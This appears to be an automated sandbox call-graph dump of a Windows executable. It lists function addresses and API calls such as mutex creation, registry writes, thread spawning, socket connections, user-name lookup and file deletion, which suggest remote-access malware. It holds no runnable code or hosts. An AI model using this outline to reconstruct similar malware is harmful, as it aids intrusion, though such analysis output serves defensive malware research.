2914bcef 28 API calls 96645->96649 97196 29137790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 96646->97196 96652 29131e65 22 API calls 96647->96652 96648 2913ec82 97194 2913729b 98 API calls 96648->97194 96653 2913f3ba 96649->96653 96654 2913ecd4 96652->96654 97079 29143a5e RegOpenKeyExW 96653->97079 96973 2914bcef 96654->96973 96656->96632 96660 2913ecac 96656->96660 96657 2913ecdf 96977 29131f13 96657->96977 97195 2913729b 98 API calls 96660->97195 96664 29131f09 11 API calls 96665 2913f3d7 96664->96665 96667 29131f09 11 API calls 96665->96667 96669 2913f3e0 96667->96669 97082 2913dd7d 96669->97082 96670 29131e65 22 API calls 96671 2913ecfc 96670->96671 96675 29131e65 22 API calls 96671->96675 96677 2913ed16 96675->96677 96676 2913f3ea 96678 29131e65 22 API calls 96677->96678 96679 2913ed30 96678->96679 96680 29131e65 22 API calls 96679->96680 96681 2913ed49 96680->96681 96682 2913edb6 96681->96682 96683 29131e65 22 API calls 96681->96683 96684 2913edc5 96682->96684 96689 2913ef41 ___scrt_fastfail 96682->96689 96688 2913ed5e _wcslen 96683->96688 96685 2913edce 96684->96685 96706 2913ee4a ___scrt_fastfail 96684->96706 96686 29131e65 22 API calls 96685->96686 96687 2913edd7 96686->96687 96690 29131e65 22 API calls 96687->96690 96688->96682 96691 29131e65 22 API calls 96688->96691 97257 29143733 RegOpenKeyExA RegQueryValueExA RegCloseKey 96689->97257 96692 2913ede9 96690->96692 96693 2913ed79 96691->96693 96695 29131e65 22 API calls 96692->96695 96697 29131e65 22 API calls 96693->96697 96696 2913edfb 96695->96696 96700 29131e65 22 API calls 96696->96700 96698 2913ed8e 96697->96698 97197 2913da6f 96698->97197 96699 2913ef8c 96701 29131e65 22 API calls 96699->96701 96702 2913ee24 96700->96702 96703 2913efb1 96701->96703 96709 29131e65 22 API calls 96702->96709 96999 29132093 96703->96999 96989 29143982 96706->96989 96707 29131f13 28 API calls 96708 2913edad 96707->96708 96711 29131f09 11 API calls 96708->96711 96713 2913ee35 96709->96713 96711->96682 96712 2913efc3 97005 291437aa RegCreateKeyA 96712->97005 97255 2913ce34 45 API calls _wcslen 96713->97255 96718 2913eede ctype 96722 29131e65 22 API calls 96718->96722 96719 2913ee45 96719->96706 96720 29131e65 22 API calls 96721 2913efe5 96720->96721 97011 2916bb2c 96721->97011 96723 2913eef5 96722->96723 96723->96699 96727 2913ef09 96723->96727 96726 2913effc 97258 2914ce2c 87 API calls ___scrt_fastfail 96726->97258 96729 29131e65 22 API calls 96727->96729 96728 2913f01f 96732 29132093 28 API calls 96728->96732 96730 2913ef12 96729->96730 96733 2914bcef 28 API calls 96730->96733 96735 2913f034 96732->96735 96736 2913ef1e 96733->96736 96734 2913f003 CreateThread 96734->96728 97830 2914d4ee 10 API calls 96734->97830 96737 29132093 28 API calls 96735->96737 97256 2913f4af 104 API calls 96736->97256 96739 2913f043 96737->96739 97015 2914b580 96739->97015 96740 2913ef23 96740->96699 96742 2913ef2a 96740->96742 96742->96624 96744 29131e65 22 API calls 96745 2913f054 96744->96745 96746 29131e65 22 API calls 96745->96746 96747 2913f066 96746->96747 96748 29131e65 22 API calls 96747->96748 96749 2913f086 96748->96749 96750 2916bb2c _strftime 40 API calls 96749->96750 96751 2913f093 96750->96751 96752 29131e65 22 API calls 96751->96752 96753 2913f09e 96752->96753 96754 29131e65 22 API calls 96753->96754 96755 2913f0af 96754->96755 96756 29131e65 22 API calls 96755->96756 96757 2913f0c4 96756->96757 96758 29131e65 22 API calls 96757->96758 96759 2913f0d5 96758->96759 96760 2913f0dc StrToIntA 96759->96760 97039 29139e1f 96760->97039 96763 29131e65 22 API calls 96764 2913f0f7 96763->96764 96765 2913f103 96764->96765 96766 2913f13c 96764->96766 97259 2916455e 22 API calls 2 library calls 96765->97259 96768 29131e65 22 API calls 96766->96768 96770 2913f14c 96768->96770 96769 2913f10c 96771 29131e65 22 API calls 96769->96771 96774 2913f194 96770->96774 96775 2913f158 96770->96775 96772 2913f11f 96771->96772 96773 2913f126 CreateThread 96772->96773 96773->96766 97826 2914a045 103 API calls 2 library calls 96773->97826 96777 29131e65 22 API calls 96774->96777 97260 2916455e 22 API calls 2 library calls 96775->97260 96778 2913f19d 96777->96778 96782 2913f207 96778->96782 96783 2913f1a9 96778->96783 96779 2913f161 96780 29131e65 22 API calls 96779->96780 96781 2913f173 96780->96781 96786 2913f17a CreateThread 96781->96786 96784 29131e65 22 API calls 96782->96784 96785 29131e65 22 API calls 96783->96785 96787 2913f210 96784->96787 96788 2913f1b9 96785->96788 96786->96774 97825 2914a045 103 API calls 2 library calls 96786->97825 96789 2913f255 96787->96789 96790 2913f21c 96787->96790 96791 29131e65 22 API calls 96788->96791 97064 2914b69e 96789->97064 96793 29131e65 22 API calls 96790->96793 96794 2913f1ce 96791->96794 96796 2913f225 96793->96796 97261 2913da23 31 API calls 96794->97261 96801 29131e65 22 API calls 96796->96801 96797 29131f13 28 API calls 96798 2913f269 96797->96798 96800 29131f09 11 API calls 96798->96800 96803 2913f272 96800->96803 96804 2913f23a 96801->96804 96802 2913f1e1 96805 29131f13 28 API calls 96802->96805 96806 2913f27b SetProcessDEPPolicy 96803->96806 96807 2913f27e CreateThread 96803->96807 96812 2916bb2c _strftime 40 API calls 96804->96812 96808 2913f1ed 96805->96808 96806->96807 96810 2913f293 CreateThread 96807->96810 96811 2913f29f 96807->96811 97798 2913f7e2 96807->97798 96809 29131f09 11 API calls 96808->96809 96813 2913f1f6 CreateThread 96809->96813 96810->96811 97827 29142132 138 API calls 96810->97827 96814 2913f2b4 96811->96814 96815 2913f2a8 CreateThread 96811->96815 96816 2913f247 96812->96816 96813->96782 97828 29131be9 50 API calls _strftime 96813->97828 96817 2913f307 96814->96817 96819 29132093 28 API calls 96814->96819 96815->96814 97829 29142716 38 API calls ___scrt_fastfail 96815->97829 97262 2913c19d 7 API calls 96816->97262 97076 2914353a RegOpenKeyExA 96817->97076 96820 2913f2d7 96819->96820 97263 291352fd 28 API calls 96820->97263 96825 2913f328 96827 2914bcef 28 API calls 96825->96827 96829 2913f338 96827->96829 97264 29143656 31 API calls 96829->97264 96834 2913f34e 96835 29131f09 11 API calls 96834->96835 96837 2913f359 96835->96837 96836 2913f381 DeleteFileW 96836->96837 96838 2913f388 96836->96838 96837->96645 96837->96836 96839 2913f36f Sleep 96837->96839 96838->96645 96839->96837 96840->96518 96841->96522 96842->96528 96843->96525 96844->96535 96845->96536 96846->96538 96847->96541 96848->96545 96849->96547 96850->96550 96851->96548 96853 29164bb8 GetStartupInfoW 96852->96853 96853->96556 96855 2917f0eb 96854->96855 96856 2917f0e2 96854->96856 96855->96559 96859 2917efd8 49 API calls 4 library calls 96856->96859 96858->96559 96859->96855 96861 2914cc20 LoadLibraryA GetProcAddress 96860->96861 96862 2914cc10 GetModuleHandleA GetProcAddress 96860->96862 96863 2914cc49 44 API calls 96861->96863 96864 2914cc39 LoadLibraryA GetProcAddress 96861->96864 96862->96861 96863->96564 96864->96863 97267 2914b539 FindResourceA 96865->97267 96869 2913f428 ctype 97279 291320b7 96869->97279 96872 29131fe2 28 API calls 96873 2913f44e 96872->96873 96874 29131fd8 11 API calls 96873->96874 96875 2913f457 96874->96875 96876 2916bda0 new 21 API calls 96875->96876 96877 2913f468 ctype 96876->96877 97285 29136e13 96877->97285 96879 2913f49b 96879->96566 96881 2913210c 96880->96881 96882 291323ce 11 API calls 96881->96882 96883 29132126 96882->96883 96884 29132569 28 API calls 96883->96884 96885 29132134 96884->96885 96885->96569 97322 291320df 96886->97322 96888 2914bf2f 96889 29131fd8 11 API calls 96888->96889 96890 2914bf61 96889->96890 96891 29131fd8 11 API calls 96890->96891 96893 2914bf69 96891->96893 96892 2914bf31 97328 291341a2 28 API calls 96892->97328 96896 29131fd8 11 API calls 96893->96896 96898 2913ea5f 96896->96898 96897 2914bf3d 96899 29131fe2 28 API calls 96897->96899 96908 2913fb52 96898->96908 96901 2914bf46 96899->96901 96900 29131fe2 28 API calls 96907 2914bebf 96900->96907 96902 29131fd8 11 API calls 96901->96902 96904 2914bf4e 96902->96904 96903 29131fd8 11 API calls 96903->96907 97329 2914cec5 28 API calls 96904->97329 96907->96888 96907->96892 96907->96900 96907->96903 97326 291341a2 28 API calls 96907->97326 97327 2914cec5 28 API calls 96907->97327 96909 2913fb5e 96908->96909 96911 2913fb65 96908->96911 97330 29132163 11 API calls 96909->97330 96911->96574 96913 29132163 96912->96913 96914 2913219f 96913->96914 97331 29132730 11 API calls 96913->97331 96914->96576 96916 29132184 97332 29132712 11 API calls std::_Deallocate 96916->97332 96919 29131e6d 96918->96919 96920 29131e75 96919->96920 97333 29132158 22 API calls 96919->97333 96920->96581 96924 291320df 11 API calls 96923->96924 96925 2913532a 96924->96925 97334 291332a0 96925->97334 96927 29135346 96927->96589 97339 291351ef 96928->97339 96930 29136391 97343 29132055 96930->97343 96933 29131fe2 96934 29131ff1 96933->96934 96941 29132039 96933->96941 96935 291323ce 11 API calls 96934->96935 96936 29131ffa 96935->96936 96937 29132015 96936->96937 96938 2913203c 96936->96938 97377 29133098 28 API calls 96937->97377 96939 2913267a 11 API calls 96938->96939 96939->96941 96942 29131fd8 96941->96942 96943 291323ce 11 API calls 96942->96943 96944 29131fe1 96943->96944 96944->96601 96946 29131fd2 96945->96946 96947 29131fc9 96945->96947 96946->96607 97378 291325e0 28 API calls 96947->97378 97379 29131fab 96949->97379 96951 2913d0ae CreateMutexA GetLastError 96951->96623 97380 2914c048 96952->97380 96957 29131fe2 28 API calls 96958 2914b390 96957->96958 96959 29131fd8 11 API calls 96958->96959 96960 2914b398 96959->96960 96961 291435e1 31 API calls 96960->96961 96963 2914b3ee 96960->96963 96962 2914b3c1 96961->96962 96964 2914b3cc StrToIntA 96962->96964 96963->96630 96965 2914b3e3 96964->96965 96966 2914b3da 96964->96966 96968 29131fd8 11 API calls 96965->96968 97388 2914cffa 22 API calls 96966->97388 96968->96963 96970 29137765 96969->96970 96971 29143584 3 API calls 96970->96971 96972 2913776c 96971->96972 96972->96640 96972->96641 96974 2914bd03 96973->96974 97389 2913b93f 96974->97389 96976 2914bd0b 96976->96657 96978 29131f22 96977->96978 96979 29131f6a 96977->96979 96980 29132252 11 API calls 96978->96980 96986 29131f09 96979->96986 96981 29131f2b 96980->96981 96982 29131f6d 96981->96982 96983 29131f46 96981->96983 97422 29132336 96982->97422 97421 2913305c 28 API calls 96983->97421 96987 29132252 11 API calls 96986->96987 96988 29131f12 96987->96988 96988->96670 96990 291439a0 96989->96990 96991 29136e13 28 API calls 96990->96991 96992 291439b5 96991->96992 96993 291320f6 28 API calls 96992->96993 96994 291439c5 96993->96994 96995 291437aa 14 API calls 96994->96995 96996 291439cf 96995->96996 96997 29131fd8 11 API calls 96996->96997 96998 291439dc 96997->96998 96998->96718 97000 2913209b 96999->97000 97001 291323ce 11 API calls 97000->97001 97002 291320a6 97001->97002 97426 291324ed 97002->97426 97006 291437fa 97005->97006 97009 291437c3 97005->97009 97007 29131fd8 11 API calls 97006->97007 97008 2913efd9 97007->97008 97008->96720 97010 291437d5 RegSetValueExA RegCloseKey 97009->97010 97010->97006 97012 2916bb45 _strftime 97011->97012 97430 2916ae83 97012->97430 97014 2913eff2 97014->96726 97014->96728 97016 2914b596 GetLocalTime 97015->97016 97017 2914b631 97015->97017 97018 2913531e 28 API calls 97016->97018 97019 29131fd8 11 API calls 97017->97019 97020 2914b5d8 97018->97020 97021 2914b639 97019->97021 97022 29136383 28 API calls 97020->97022 97023 29131fd8 11 API calls 97021->97023 97024 2914b5e4 97022->97024 97025 2913f048 97023->97025 97458 29132f10 97024->97458 97025->96744 97028 29136383 28 API calls 97029 2914b5fc 97028->97029 97463 2913723b 77 API calls 97029->97463 97031 2914b60a 97032 29131fd8 11 API calls 97031->97032 97033 2914b616 97032->97033 97034 29131fd8 11 API calls 97033->97034 97035 2914b61f 97034->97035 97036 29131fd8 11 API calls 97035->97036 97037 2914b628 97036->97037 97038 29131fd8 11 API calls 97037->97038 97038->97017 97040 29139e3d _wcslen 97039->97040 97041 29139e48 97040->97041 97042 29139e5f 97040->97042 97043 2913da6f 31 API calls 97041->97043 97044 2913da6f 31 API calls 97042->97044 97045 29139e50 97043->97045 97046 29139e67 97044->97046 97048 29131f13 28 API calls 97045->97048 97047 29131f13 28 API calls 97046->97047 97049 29139e75 97047->97049 97050 29139e5a 97048->97050 97051 29131f09 11 API calls 97049->97051 97053 29131f09 11 API calls 97050->97053 97052 29139e7d 97051->97052 97482 29139196 28 API calls 97052->97482 97055 29139eb4 97053->97055 97467 2913a144 97055->97467 97056 29139e8f 97483 29133014 97056->97483 97061 29131f13 28 API calls 97062 29139ea4 97061->97062 97063 29131f09 11 API calls 97062->97063 97063->97050 97065 2914b6c1 GetUserNameW 97064->97065 97519 2913417e 97065->97519 97070 29133014 28 API calls 97071 2914b703 97070->97071 97072 29131f09 11 API calls 97071->97072 97073 2914b70c 97072->97073 97074 29131f09 11 API calls 97073->97074 97075 2913f25e 97074->97075 97075->96797 97077 2913f31f 97076->97077 97078 2914355b RegQueryValueExA RegCloseKey 97076->97078 97077->96669 97077->96825 97078->97077 97080 2913f3cd 97079->97080 97081 29143a7a RegDeleteValueW 97079->97081 97080->96664 97081->97080 97083 2913dd96 97082->97083 97084 2914353a 3 API calls 97083->97084 97085 2913dd9d 97084->97085 97086 2913ddbc 97085->97086 97614 29131707 97085->97614 97090 29144f65 97086->97090 97088 2913ddaa 97617 291438b2 RegCreateKeyA 97088->97617 97091 291320df 11 API calls 97090->97091 97092 29144f79 97091->97092 97631 2914b944 97092->97631 97095 291320df 11 API calls 97096 29144f8f 97095->97096 97097 29131e65 22 API calls 97096->97097 97098 29144f9d 97097->97098 97099 2916bb2c _strftime 40 API calls 97098->97099 97100 29144faa 97099->97100 97101 29144fbc 97100->97101 97102 29144faf Sleep 97100->97102 97103 29132093 28 API calls 97101->97103 97102->97101 97104 29144fcb 97103->97104 97105 29131e65 22 API calls 97104->97105 97106 29144fd4 97105->97106 97107 291320f6 28 API calls 97106->97107 97108 29144fdf 97107->97108 97109 2914beac 28 API calls 97108->97109 97110 29144fe7 97109->97110 97635 2913489e WSAStartup 97110->97635 97112 29144ff1 97113 29131e65 22 API calls 97112->97113 97114 29144ffa 97113->97114 97115 29131e65 22 API calls 97114->97115 97155 29145079 97114->97155 97116 29145013 97115->97116 97118 29131e65 22 API calls 97116->97118 97117 291320f6 28 API calls 97117->97155 97119 29145024 97118->97119 97121 29131e65 22 API calls 97119->97121 97120 2914beac 28 API calls 97120->97155 97122 29145035 97121->97122 97123 29131e65 22 API calls 97122->97123 97125 29145046 97123->97125 97124 29136c59 28 API calls 97124->97155 97126 29131e65 22 API calls 97125->97126 97128 29145057 97126->97128 97127 29131fe2 28 API calls 97127->97155 97130 29131e65 22 API calls 97128->97130 97129 29131fd8 11 API calls 97129->97155 97131 29145069 97130->97131 97748 2913473d 89 API calls 97131->97748 97133 2913531e 28 API calls 97133->97155 97134 29136383 28 API calls 97134->97155 97135 29131e65 22 API calls 97135->97155 97137 291451c7 WSAGetLastError 97641 2914cb72 97137->97641 97143 2914b580 80 API calls 97143->97155 97145 29131e8d 11 API calls 97145->97155 97146 2916bb2c _strftime 40 API calls 97147 29145b0a Sleep 97146->97147 97147->97155 97148 29132f10 28 API calls 97148->97155 97149 29132093 28 API calls 97149->97155 97154 291435e1 31 API calls 97154->97155 97155->97117 97155->97120 97155->97124 97155->97127 97155->97129 97155->97133 97155->97134 97155->97135 97155->97137 97155->97143 97155->97145 97155->97146 97155->97148 97155->97149 97155->97154 97173 291453f6 97155->97173 97636 29144f24 97155->97636 97652 2913482d 97155->97652 97659 29134f51 97155->97659 97674 291348c8 connect 97155->97674 97734 29134e26 WaitForSingleObject 97155->97734 97749 291352fd 28 API calls 97155->97749 97750 291445f8 51 API calls 97155->97750 97751 29139097 28 API calls 97155->97751 97752 29171ed1 20 API calls 97155->97752 97753 29143733 RegOpenKeyExA RegQueryValueExA RegCloseKey 97155->97753 97156 2913417e 28 API calls 97156->97173 97159 2914bdaf 28 API calls 97159->97173 97160 2914bc1f 28 API calls 97160->97173 97161 29131e65 22 API calls 97162 29145474 GetTickCount 97161->97162 97756 2914bc1f 28 API calls 97162->97756 97168 29132f10 28 API calls 97168->97173 97169 29136383 28 API calls 97169->97173 97170 29132ea1 28 API calls 97170->97173 97172 29131fd8 11 API calls 97172->97173 97173->97155 97173->97156 97173->97159 97173->97160 97173->97161 97173->97168 97173->97169 97173->97170 97173->97172 97176 29132093 28 API calls 97173->97176 97177 2914b580 80 API calls 97173->97177 97178 29145aac CreateThread 97173->97178 97179 29131f09 11 API calls 97173->97179 97754 2913ddc4 6 API calls 97173->97754 97755 2914bcd3 28 API calls 97173->97755 97757 2914bb77 GetTickCount 97173->97757 97758 2914bb27 30 API calls ___scrt_fastfail 97173->97758 97759 2913f90c 29 API calls 97173->97759 97760 29132f31 28 API calls 97173->97760 97761 29134aa1 61 API calls ctype 97173->97761 97762 29134c10 113 API calls new 97173->97762 97763 2913b08c 85 API calls 97173->97763 97176->97173 97177->97173 97178->97173 97787 2914ada8 105 API calls 97178->97787 97179->97173 97180->96582 97181->96590 97182->96594 97185 291320df 11 API calls 97184->97185 97186 29136c65 97185->97186 97187 291332a0 28 API calls 97186->97187 97188 29136c82 97187->97188 97188->96615 97190 291435ae RegQueryValueExA RegCloseKey 97189->97190 97191 2913ebdf 97189->97191 97190->97191 97191->96611 97191->96629 97192->96619 97193->96648 97194->96640 97195->96632 97196->96647 97788 29131f86 97197->97788 97200 2913dae0 97203 2914c048 GetCurrentProcess 97200->97203 97201 2913daab 97792 2914b645 29 API calls 97201->97792 97202 2913daa1 97205 2913dbd4 GetLongPathNameW 97202->97205 97207 2913dae5 97203->97207 97206 2913417e 28 API calls 97205->97206 97209 2913dbe9 97206->97209 97210 2913db3b 97207->97210 97211 2913dae9 97207->97211 97208 2913dab4 97212 29131f13 28 API calls 97208->97212 97213 2913417e 28 API calls 97209->97213 97214 2913417e 28 API calls 97210->97214 97215 2913417e 28 API calls 97211->97215 97249 2913dabe 97212->97249 97216 2913dbf8 97213->97216 97217 2913db49 97214->97217 97218 2913daf7 97215->97218 97795 2913de0c 28 API calls 97216->97795 97223 2913417e 28 API calls 97217->97223 97224 2913417e 28 API calls 97218->97224 97220 29131f09 11 API calls 97220->97202 97221 2913dc0b 97796 29132fa5 28 API calls 97221->97796 97226 2913db5f 97223->97226 97227 2913db0d 97224->97227 97225 2913dc16 97797 29132fa5 28 API calls 97225->97797 97794 29132fa5 28 API calls 97226->97794 97793 29132fa5 28 API calls 97227->97793 97231 2913dc20 97234 29131f09 11 API calls 97231->97234 97232 2913db6a 97235 29131f13 28 API calls 97232->97235 97233 2913db18 97236 29131f13 28 API calls 97233->97236 97237 2913dc2a 97234->97237 97238 2913db75 97235->97238 97239 2913db23 97236->97239 97240 29131f09 11 API calls 97237->97240 97241 29131f09 11 API calls 97238->97241 97242 29131f09 11 API calls 97239->97242 97244 2913dc33 97240->97244 97245 2913db7e 97241->97245 97243 2913db2c 97242->97243 97247 29131f09 11 API calls 97243->97247 97248 29131f09 11 API calls 97244->97248 97246 29131f09 11 API calls 97245->97246 97246->97249 97247->97249 97250 2913dc3c 97248->97250 97249->97220 97251 29131f09 11 API calls 97250->97251 97252 2913dc45 97251->97252 97253 29131f09 11 API calls 97252->97253 97254 2913dc4e 97253->97254 97254->96707 97255->96719 97256->96740 97257->96699 97258->96734 97259->96769 97260->96779 97261->96802 97262->96789 97264->96834 97265->96639 97268 2914b556 LoadResource LockResource SizeofResource 97267->97268 97269 2913f419 97267->97269 97268->97269 97270 2916bda0 97269->97270 97271 291761b8 97270->97271 97272 291761f6 97271->97272 97273 291761e1 HeapAlloc 97271->97273 97277 291761ca ___crtLCMapStringA 97271->97277 97289 2917062d 20 API calls _Atexit 97272->97289 97275 291761f4 97273->97275 97273->97277 97276 291761fb 97275->97276 97276->96869 97277->97272 97277->97273 97288 29173001 7 API calls 2 library calls 97277->97288 97280 291320bf 97279->97280 97290 291323ce 97280->97290 97282 291320ca 97294 2913250a 97282->97294 97284 291320d9 97284->96872 97286 291320b7 28 API calls 97285->97286 97287 29136e27 97286->97287 97287->96879 97288->97277 97289->97276 97291 29132428 97290->97291 97292 291323d8 97290->97292 97291->97282 97292->97291 97301 291327a7 11 API calls std::_Deallocate 97292->97301 97295 2913251a 97294->97295 97296 29132520 97295->97296 97297 29132535 97295->97297 97302 29132569 97296->97302 97312 291328e8 28 API calls 97297->97312 97300 29132533 97300->97284 97301->97291 97313 29132888 97302->97313 97304 2913257d 97305 29132592 97304->97305 97306 291325a7 97304->97306 97318 29132a34 22 API calls 97305->97318 97320 291328e8 28 API calls 97306->97320 97309 2913259b 97319 291329da 22 API calls 97309->97319 97311 291325a5 97311->97300 97312->97300 97314 29132890 97313->97314 97315 29132898 97314->97315 97321 29132ca3 22 API calls 97314->97321 97315->97304 97318->97309 97319->97311 97320->97311 97323 291320e7 97322->97323 97324 291323ce 11 API calls 97323->97324 97325 291320f2 97324->97325 97325->96907 97326->96907 97327->96907 97328->96897 97329->96888 97330->96911 97331->96916 97332->96914 97335 291332aa 97334->97335 97337 291332c9 97335->97337 97338 291328e8 28 API calls 97335->97338 97337->96927 97338->97337 97340 291351fb 97339->97340 97349 29135274 97340->97349 97342 29135208 97342->96930 97344 29132061 97343->97344 97345 291323ce 11 API calls 97344->97345 97346 2913207b 97345->97346 97373 2913267a 97346->97373 97350 29135282 97349->97350 97351 29135288 97350->97351 97352 2913529e 97350->97352 97360 291325f0 97351->97360 97354 291352f5 97352->97354 97355 291352b6 97352->97355 97370 291328a4 22 API calls 97354->97370 97359 2913529c 97355->97359 97369 291328e8 28 API calls 97355->97369 97359->97342 97361 29132888 22 API calls 97360->97361 97362 29132602 97361->97362 97363 29132672 97362->97363 97364 29132629 97362->97364 97372 291328a4 22 API calls 97363->97372 97368 2913263b 97364->97368 97371 291328e8 28 API calls 97364->97371 97368->97359 97369->97359 97371->97368 97374 2913268b 97373->97374 97375 291323ce 11 API calls 97374->97375 97376 2913208d 97375->97376 97376->96933 97377->96941 97378->96946 97381 2914c055 GetCurrentProcess 97380->97381 97382 2914b362 97380->97382 97381->97382 97383 291435e1 RegOpenKeyExA 97382->97383 97384 2914360f RegQueryValueExA RegCloseKey 97383->97384 97385 29143639 97383->97385 97384->97385 97386 29132093 28 API calls 97385->97386 97387 2914364e 97386->97387 97387->96957 97388->96965 97390 2913b947 97389->97390 97395 29132252 97390->97395 97392 2913b952 97399 2913b967 97392->97399 97394 2913b961 97394->96976 97396 291322ac 97395->97396 97397 2913225c 97395->97397 97396->97392 97397->97396 97406 29132779 11 API calls std::_Deallocate 97397->97406 97400 2913b973 97399->97400 97401 2913b9a1 97399->97401 97407 291327e6 97400->97407 97418 291328a4 22 API calls 97401->97418 97405 2913b97d 97405->97394 97406->97396 97408 291327ef 97407->97408 97409 29132851 97408->97409 97410 291327f9 97408->97410 97420 291328a4 22 API calls 97409->97420 97413 29132802 97410->97413 97415 29132815 97410->97415 97419 29132aea 28 API calls __EH_prolog 97413->97419 97416 29132813 97415->97416 97417 29132252 11 API calls 97415->97417 97416->97405 97417->97416 97419->97416 97421->96979 97423 29132347 97422->97423 97424 29132252 11 API calls 97423->97424 97425 291323c7 97424->97425 97425->96979 97427 291324f9 97426->97427 97428 2913250a 28 API calls 97427->97428 97429 291320b1 97428->97429 97429->96712 97446 2916ba8a 97430->97446 97432 2916aed0 97452 2916a837 36 API calls 3 library calls 97432->97452 97434 2916ae95 97434->97432 97435 2916aeaa 97434->97435 97437 2916aeaf _Atexit 97434->97437 97451 2917062d 20 API calls _Atexit 97435->97451 97437->97014 97439 2916aedc 97442 2916af0b 97439->97442 97453 2916bacf 40 API calls __Toupper 97439->97453 97440 2916af77 97455 2916ba36 20 API calls 2 library calls 97440->97455 97442->97440 97454 2916ba36 20 API calls 2 library calls 97442->97454 97444 2916b03e _strftime 97444->97437 97456 2917062d 20 API calls _Atexit 97444->97456 97447 2916baa2 97446->97447 97448 2916ba8f 97446->97448 97447->97434 97457 2917062d 20 API calls _Atexit 97448->97457 97450 2916ba94 _Atexit 97450->97434 97451->97437 97452->97439 97453->97439 97454->97440 97455->97444 97456->97437 97457->97450 97464 29131fb0 97458->97464 97460 29132f1e 97461 29132055 11 API calls 97460->97461 97462 29132f2d 97461->97462 97462->97028 97463->97031 97465 291325f0 28 API calls 97464->97465 97466 29131fbd 97465->97466 97466->97460 97468 2913a162 97467->97468 97469 29143584 3 API calls 97468->97469 97470 2913a169 97469->97470 97471 2913a197 97470->97471 97472 2913a17d 97470->97472 97490 29139097 28 API calls 97471->97490 97474 2913a182 97472->97474 97475 29139ed6 97472->97475 97488 29139097 28 API calls 97474->97488 97475->96763 97477 2913a1a5 97491 2913a1b4 86 API calls 97477->97491 97478 2913a190 97489 2913a268 29 API calls 97478->97489 97481 2913a195 97481->97475 97482->97056 97496 29133222 97483->97496 97485 29133022 97500 29133262 97485->97500 97488->97478 97489->97481 97492 2913a2ae 163 API calls 97489->97492 97490->97477 97491->97475 97493 2913a2a2 86 API calls 97491->97493 97494 2913a2c4 48 API calls 97491->97494 97495 2913a2b8 128 API calls 97491->97495 97497 2913322e 97496->97497 97506 29133618 97497->97506 97499 2913323b 97499->97485 97501 2913326e 97500->97501 97502 29132252 11 API calls 97501->97502 97503 29133288 97502->97503 97504 29132336 11 API calls 97503->97504 97505 29133031 97504->97505 97505->97061 97507 29133626 97506->97507 97508 29133644 97507->97508 97509 2913362c 97507->97509 97510 2913369e 97508->97510 97511 2913365c 97508->97511 97517 291336a6 28 API calls 97509->97517 97518 291328a4 22 API calls 97510->97518 97513 29133642 97511->97513 97515 291327e6 28 API calls 97511->97515 97513->97499 97515->97513 97517->97513 97520 29134186 97519->97520 97521 29132252 11 API calls 97520->97521 97522 29134191 97521->97522 97530 291341bc 97522->97530 97525 291342fc 97542 29134353 97525->97542 97527 2913430a 97528 29133262 11 API calls 97527->97528 97529 29134319 97528->97529 97529->97070 97531 291341c8 97530->97531 97534 291341d9 97531->97534 97533 2913419c 97533->97525 97535 291341e9 97534->97535 97536 29134206 97535->97536 97537 291341ef 97535->97537 97538 291327e6 28 API calls 97536->97538 97541 29134267 28 API calls 97537->97541 97540 29134204 97538->97540 97540->97533 97541->97540 97543 2913435f 97542->97543 97546 29134371 97543->97546 97545 2913436d 97545->97527 97547 2913437f 97546->97547 97548 29134385 97547->97548 97549 2913439e 97547->97549 97612 291334e6 28 API calls 97548->97612 97550 29132888 22 API calls 97549->97550 97551 291343a6 97550->97551 97553 29134419 97551->97553 97554 291343bf 97551->97554 97613 291328a4 22 API calls 97553->97613 97556 291327e6 28 API calls 97554->97556 97565 2913439c 97554->97565 97556->97565 97565->97545 97612->97565 97620 2916ab1a 97614->97620 97618 291438f4 97617->97618 97619 291438ca RegSetValueExA RegCloseKey 97617->97619 97618->97086 97619->97618 97623 2916aa9b 97620->97623 97622 2913170d 97622->97088 97624 2916aabe 97623->97624 97625 2916aaaa 97623->97625 97627 2916aaaf __alldvrm _Atexit 97624->97627 97630 291789d7 11 API calls 2 library calls 97624->97630 97629 2917062d 20 API calls _Atexit 97625->97629 97627->97622 97629->97627 97630->97627 97634 2914b98a ctype ___scrt_fastfail 97631->97634 97632 29132093 28 API calls 97633 29144f84 97632->97633 97633->97095 97634->97632 97635->97112 97637 29144f33 97636->97637 97638 29144f3d getaddrinfo WSASetLastError 97636->97638 97764 29144dc1 29 API calls ___std_exception_copy 97637->97764 97638->97155 97640 29144f38 97640->97638 97642 291320df 11 API calls 97641->97642 97643 2914cb86 FormatMessageA 97642->97643 97644 2914cba4 97643->97644 97645 2914cbb2 97643->97645 97646 29132093 28 API calls 97644->97646 97648 2914cbbd LocalFree 97645->97648 97647 2914cbb0 97646->97647 97650 29131fd8 11 API calls 97647->97650 97649 29132055 11 API calls 97648->97649 97649->97647 97651 2914cbd9 97650->97651 97651->97155 97653 29134846 socket 97652->97653 97654 29134839 97652->97654 97656 29134842 97653->97656 97657 29134860 CreateEventW 97653->97657 97765 2913489e WSAStartup 97654->97765 97656->97155 97657->97155 97658 2913483e 97658->97653 97658->97656 97660 29134f65 97659->97660 97661 29134fea 97659->97661 97662 29134f6e 97660->97662 97663 29134fc0 CreateEventA CreateThread 97660->97663 97664 29134f7d GetLocalTime 97660->97664 97661->97155 97662->97663 97663->97661 97768 29135150 97663->97768 97766 2914bc1f 28 API calls 97664->97766 97666 29134f91 97767 291352fd 28 API calls 97666->97767 97675 29134a1b 97674->97675 97679 291348ee 97674->97679 97676 29134a21 WSAGetLastError 97675->97676 97677 2913497e 97675->97677 97676->97677 97680 29134a31 97676->97680 97677->97155 97678 29134923 97772 29150cf1 27 API calls 97678->97772 97679->97677 97679->97678 97681 2913531e 28 API calls 97679->97681 97682 29134932 97680->97682 97683 29134a36 97680->97683 97685 2913490f 97681->97685 97689 29132093 28 API calls 97682->97689 97686 2914cb72 30 API calls 97683->97686 97690 29132093 28 API calls 97685->97690 97691 29134a40 97686->97691 97687 2913492b 97687->97682 97688 29134941 97687->97688 97698 29134950 97688->97698 97699 29134987 97688->97699 97692 29134a80 97689->97692 97693 2913491e 97690->97693 97783 291352fd 28 API calls 97691->97783 97695 29132093 28 API calls 97692->97695 97696 2914b580 80 API calls 97693->97696 97700 29134a8f 97695->97700 97696->97678 97702 29132093 28 API calls 97698->97702 97780 29151ad1 54 API calls 97699->97780 97703 2914b580 80 API calls 97700->97703 97708 2913495f 97702->97708 97703->97677 97706 2913498f 97709 291349c4 97706->97709 97710 29134994 97706->97710 97712 29132093 28 API calls 97708->97712 